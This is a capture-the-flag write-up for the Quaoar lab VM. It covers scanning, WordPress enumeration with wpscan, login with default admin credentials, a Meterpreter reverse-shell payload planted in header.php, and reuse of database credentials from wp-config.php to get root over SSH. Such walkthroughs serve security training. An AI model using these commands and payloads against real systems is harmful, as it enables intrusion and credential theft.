Write Up Quaoar CTF
| Name | Author | Series | Difficulty |
|---|---|---|---|
| Quaoar | Viper | hackfest2016 | Very Easy |
We start with checking our IP address with:
ifconfig
Our IP is:
192.168.1.45
Now open Zenmap (nmap GUI verison),
and do a "Quick Scan" for the IP "192.168.1.*" ( * symbolize for every number)
We found that the Target IP is:
192.168.1.47
and that there are a lot of open ports, include the http port (80),
so let's try to put this IP in the FireFox
When we click on the image we move to this page
But there is nothing in those pages or in the pages source
Let's try to check what we have on the web server with Nikto
nikto -h 192.168.1.47
We got that there is a
- rotbots.txt - we need to manually open
- Wordpress - on the server
Let's use Curl to get information from server (we want to get the robots.txt file)
curl -h 192.168.1.47/robots.txt
We got that there is Wordpress on the server, and that hackers are not allowed (sad smiley).
- robtos.txt
now let's check the Wordpress
- Wordpress
We have excellent tool for Wordpress called wpscan, so let's use it.
wpscan --url 192.168.1.47/wordpress --enumerate
| username | Password |
|---|---|
| admin | admin |
| wpuser | wpuser |
We can see that we got the WP verison and that the default admin password is still in use!!
Now to move to the login page, just click on the login button the left down corner of the page
192.168.1.47/wordpress/wp-login.php
now use the username:password
admin:admin
and....We're in! Whenever you login to Wordpress admin page, it's recommnded to try to upload php shell script. So let's create one with msfvenom (it's tool of Metasploit that generate payloads)
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.45 LPORT=4444 -f raw > Desktop/phpshell.php
Let's break it down -
- msfvenom - the software we use
- -p php/meterpreter/reverse_tcp - the payload we want to use
- LHOST 192.168.1.45 - our host to send the information to.
- LPORT 4444 - the port we want to work on
- -f raw - the file format we want
- > Desktop/phpshell.php - where we want to save the file and the name of it
Now open the file with some editor and copy the php code
Now we need to go back to the wordpress admin panel and find some place to upload this php code, let's check if in the Appearance there is some place for this, maybe in the editor. Yes we can find on the right side of the screen the php code for the header lets click on it, and paste our code and at the end upload it to the server.
- Appearance
- Editor
- header.php
- paste code
- upload
Now we want to start listening to this port, so we open msfconsole.
msfconsole
and update our settings
use exploit/multi/handler
set lhost 192.168.1.45
set lport 4444
exploit
and now we are start listening. Open the web page of wordpress
192.168.1.47/wordpress
And back to the console we can see that we have connection
We want to search in files for clues, so let's see what files we have with the basic command
ls
We can see a config file, open it
cat wp-config.php
we can see we have a username and password to MySQL, maybe its the same for the ssh?
| username | password |
|---|---|
| root | rootpassword! |
to connect for the ssh we use this:
ssh root@192.168.1.47
it's ask for password, so write rootpassword! (you cant see your typing when you type the password but keep typing and press enter) And we are in!
Again let's check the files for clues with
ls
we can see a file name flag.txt. Open it
cat flag.txt
8e3f9ec016e3598c5eec11fd3d73f6fb